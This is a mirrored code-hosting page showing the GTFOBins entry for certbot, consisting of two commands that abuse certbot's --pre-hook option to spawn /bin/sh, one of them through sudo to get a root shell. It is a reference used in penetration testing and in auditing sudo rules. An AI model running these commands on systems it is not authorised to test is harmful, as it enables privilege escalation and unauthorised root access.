This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-28 11:11:41 +01:00
Code
Issues
a4e55ccd5e
GTFOBins.github.io
/
_gtfobins
/
certbot.md
Andrea Cardaci
a02e1a1194
Promote certbot command to shell
2021-04-03 12:04:09 +02:00
429 B
Raw
Blame
History
functions
shell
sudo
code
TF=$(mktemp -d) certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 2>&0'
code
TF=$(mktemp -d) sudo certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 2>&0'